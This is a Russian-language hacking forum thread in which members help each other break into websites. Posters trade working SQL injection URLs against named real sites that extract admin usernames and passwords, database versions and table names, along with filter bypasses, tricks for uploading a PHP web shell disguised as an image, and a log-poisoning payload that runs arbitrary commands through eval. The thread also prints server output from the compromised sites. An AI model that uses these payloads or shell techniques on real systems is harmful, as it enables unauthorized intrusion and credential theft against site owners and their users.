Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    при заливке шелла в админке вот что мне вылетело:
    Code:
    Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
    
    Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
    
    Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
    
    Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122
    
    Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123
    
    Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124
    
    Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125
    
    Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126
    
    Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128
    
    шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ?
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    во-первых, загрузить корректный jpg(png,bmp,gif по вкусу) с кодом php-шелла - если расширение .php не меняется, ты смог это обойти или другой способ... то будет шелл.
    во-вторых, судя по ошибкам - там картинки пережимаются скриптом, так что все пхп-теги и код будет утерян. Шелла не видать тебе.
     
  3. b82a

    b82a Elder - Старейшина

    Joined:
    7 Feb 2010
    Messages:
    150
    Likes Received:
    48
    Reputations:
    25
    Оно как бе пытается ресайзнуть картинку, но не получается, shell.php.jpg пробовал?
     
  4. Rabben

    Rabben New Member

    Joined:
    27 Mar 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    делаю запрос:
    http://test.ru/news.php?s=news_date%20DESC&v=0&newscat_id=-1+UNION%20SELECT%20concat(username,0x3a,password),2,3+from+admins

    ответ:
    Error: Illegal mix of collations for operation 'UNION'
    File: /var/www/test.ru/htdocs/news.php
    Line: 69
    Query: SELECT newscat_id, newscat_title, newscat_dependency FROM newscats WHERE newscat_id=-1 UNION SELECT concat(username,0x3a,password),2,3 from admins LIMIT 1

    Как я понимаю, это из-за кодировки. Как подправить запрос? Кодировка utf8
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Unhex(hex(version()))
     
    2 people like this.
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://www.omega-pharma.be/EN/onafh_content.php?id=5

    vot pomoqite nayti version() ili user() ?
     
  7. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://www.omega-pharma.be/EN/onafh_content.php?id=5+and+substring(version(),1,1)=4
    или через ошибку попробуй
     
    1 person likes this.
  8. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    http://www.omega-pharma.be/EN/onafh_content.php?id=(4)or(1,1)=(select(count(0)),concat((version()),floor(rand(0)*2))from(login)GROUP BY 2)

    Duplicate entry '4.1.21-standard1' for key 1
     
    #12648 v1d0qz, 3 May 2010
    Last edited: 3 May 2010
    1 person likes this.
  9. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.retention.se/news.asp?id=1'&pg=1

    вот никак не могу раскрутить инъекцию. Максимум что удалось:
    1) узнать количество полей
    2) и добыть информацию с последней талблицы в бд с помощью "having"

    ни версии, ни имени бд, пользователя никак. В чем может быть проблема?
     
  10. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    spasibo..

    a kak table_name i t.d ?
     
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    тож не выводит. Выводит только то что и при запросе

    http://www.retention.se/news.asp?id=1&pg=1

    без всяких там ошибок и т.д.
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.retention.se/news.asp?id=1+or+1=convert(int,@@version)&pg=1
    
    System information:
    -----------------------------------------
    system_user: retenti_groupse
    @@version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) 
    	Nov 24 2008 13:01:59 
    	Copyright (c) 1988-2005 Microsoft Corporation
    	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    
    db_name(): retenti_se
    
    select фильтруется, думай
     
  13. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Подскажите как передать гет запрос с <? system.... ?> , что бы в логах скобочки не заменились на %3c %3e
     
  14. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,174
    Likes Received:
    617
    Reputations:
    690
    <?php file_get_contents('http://site.ru/<?php eval(stripslashes($_REQUEST[cmd]));?>');?>
     
    _________________________
    1 person likes this.
  15. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Всем привет! наткнулся на такую ошибку...
    Code:
    Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 42 in /home/site/public_html/php/config/functions.php on line 931
    Урл вида: http://.sita.net/index.php?id=11&new=-6
    Можно ли провести инъекцию :confused:
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    pinch
    http://www.retention.se/news.asp?id=1+and+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)&pg=1

    и далее по сценарию

    ======================

    Pashkela
    Опять у тебя ненужные навороты. Они запутывают людей
    Зачем
    Если
    http://www.retention.se/news.asp?id=1+or+1=@@version&pg=1
     
    2 people like this.
  17. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    спасибо. оказывается фильтры на: select, or, OR, --
    а я из мухи слона делаю
     
  18. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Потому что это тхт файл который не выполняется =/
    Надо с раширением php залить.
     
  19. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Может, потому что там file_get_contents, а не инклуд?
     
  20. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Бгг да точно) но как бы он его как-то залил... логика значит надо залить с другим расширением ато да читалка)
     
    1 person likes this.
Thread Status:
Not open for further replies.